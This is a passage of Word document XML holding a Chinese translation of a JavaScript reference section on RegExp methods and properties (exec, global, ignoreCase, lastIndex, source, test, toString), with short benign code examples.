        <w:t>更复杂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中搜索匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的文本。如果它找到一个匹配项，它将返回一个由匹配结果组成的数组；否则，它将返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。返回数组的元素</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>是匹配的文本。元素</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>是匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>中第一个带圆括号的子表达式的文本，如果存在这样的子表达式的话。元素</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>包含匹配第二个子表达式的文本，依次类推。和通常一样，数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定该数组中包含的元素个数。除了数组元素和</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性外，</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的值还有另外两个属性。</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定匹配的文本的第一个字符的位置。</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>属性则指代</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>。在一个非全局的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用时，本函数返回的数组和</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的数组一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一个非全局的模式上调用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它将执行搜索并返回前面描述的结果。不过，如果</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局正则表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为将稍微复杂一点。它从</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的位置开始搜索，当它找到一个匹配项时，它将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>设置为该匹配之后的第一个字符的位置。这意味着可以重复调用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>，以便循环遍历一个字符串中所有的匹配项。如果</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>找不到匹配项，它</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>并将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>重置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。如果在成功地找到一个字符串的匹配项后，立刻开始搜索一个新的字符串，就必须小心地手动将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>重置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>总是包含它返回的数组中的每一个匹配项的全部细节，无论</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>是否为一个全局模式。这是</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
        <w:t>不同的地方，后者在使用全局匹配时只返回很少的信息。要想获得一个全局模式的完整匹配信息，唯一的方法是在一个循环中重复调用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以在一个循环中使用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>来在一个字符串中找到所有匹配项。例</w:t>
      </w:r>
      <w:r>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=/\bJava\w*\b/g;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text="JavaScript is more fun than Java or JavaBeans!";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while((result=pattern.exec(text))!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Matched'"+result[0]+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"'at position"+result.index+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"next search begins at position"+pattern.lastIndex);</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RegExp.lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.search()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="747" w:name="RegExp_global"/>
      <w:r>
        <w:t>RegExp.global</w:t>
      </w:r>
      <w:bookmarkEnd w:id="747"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式是否为全局匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp.global</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个只读的布尔值属性。它指定一个特殊的正则表达式是否执行全局匹配，也就是说，创建它时是否带有</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="748" w:name="RegExp_ignoreCase"/>
      <w:r>
        <w:t>RegExp.ignoreCase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="748"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个正则表达式是否忽略大小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp.ignoreCase</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ignoreCase</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个只读的布尔值属性。它指定一个正则表达式是否执行忽略大小写的匹配，也就是说，创建它时是否带有</w:t>
      </w:r>
      <w:r>
        <w:t>"i"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="749" w:name="RegExp_lastIndex"/>
      <w:r>
        <w:t>RegExp.lastIndex</w:t>
      </w:r>
      <w:bookmarkEnd w:id="749"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下一个匹配开始的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp.lastIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的属性。对设置</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性的正则表达式而言，它的值为一个数字，指定</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
      <w:r>
        <w:t>方法最后一个匹配项之后的第一个字符的位置。这些方法使用这个属性作为它们下一次搜索的开始位置。这允许重复调用这些方法，来循环遍历一个字符串中的所有匹配项。注意，那些没有设置</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性的非全局模式对应的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象不会使用</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性是可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的，所以可以在任何时候设置它，以便定义下一次搜索在目标字符串中的开始位置。</w:t>
      </w:r>
      <w:r>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>在没找</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>到匹配项（或另一个匹配项）时会自动将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。如果在一次成功的匹配之后搜索一个新的字符串，一般需要显式地把这个属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</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RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="750" w:name="RegExp_source"/>
      <w:r>
        <w:t>RegExp.source</w:t>
      </w:r>
      <w:bookmarkEnd w:id="750"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp.source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个只读字符串属性。它的值为该</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>模式的文本内容。这个文本不包括正则表达式直接量中的分隔斜杠，也不包含</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"i"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"m"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="751" w:name="RegExp_test__"/>
      <w:r>
        <w:t>RegExp.test</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="751"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试一个字符串是否匹配一个模式</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regexp.test(string)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待测试的字符串。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如果</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>包含匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的文本则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</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如果在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>用于测试字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>是否包含匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的文本。如果包含，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。调用一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并传入字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>等同于下面的表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(r.exec(s)!=null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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pattern=/java/i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pattern.test("JavaScript");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pattern.test("ECMAScript");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</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RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="752" w:name="RegExp_toString__"/>
      <w:r>
        <w:t>RegExp.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="752"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个正则表达式转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toStri</w:t>
      </w:r>
      <w:r>
        <w:t>ng()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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如果在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用正则表达式直接量的格式返回一个正则表达式的字符串表示。注意，这个方法的实现上并不要求添加转义序列，以便保证返回的字符串是合法的正则表达式直接量。设想由表达式</w:t>
      </w:r>
      <w:r>
        <w:t>new RegExp("/"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>"g")</w:t>
      </w:r>
      <w:r>
        <w:t>创建的正则表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>的一个实现可能会返回</w:t>
      </w:r>
      <w:r>
        <w:t>/\//g</w:t>
      </w:r>
      <w:r>
        <w:t>；它也可能添加一个转义序列并返</w:t>
      </w:r>
      <w:r>
        <w:t>回</w:t>
      </w:r>
      <w:r>
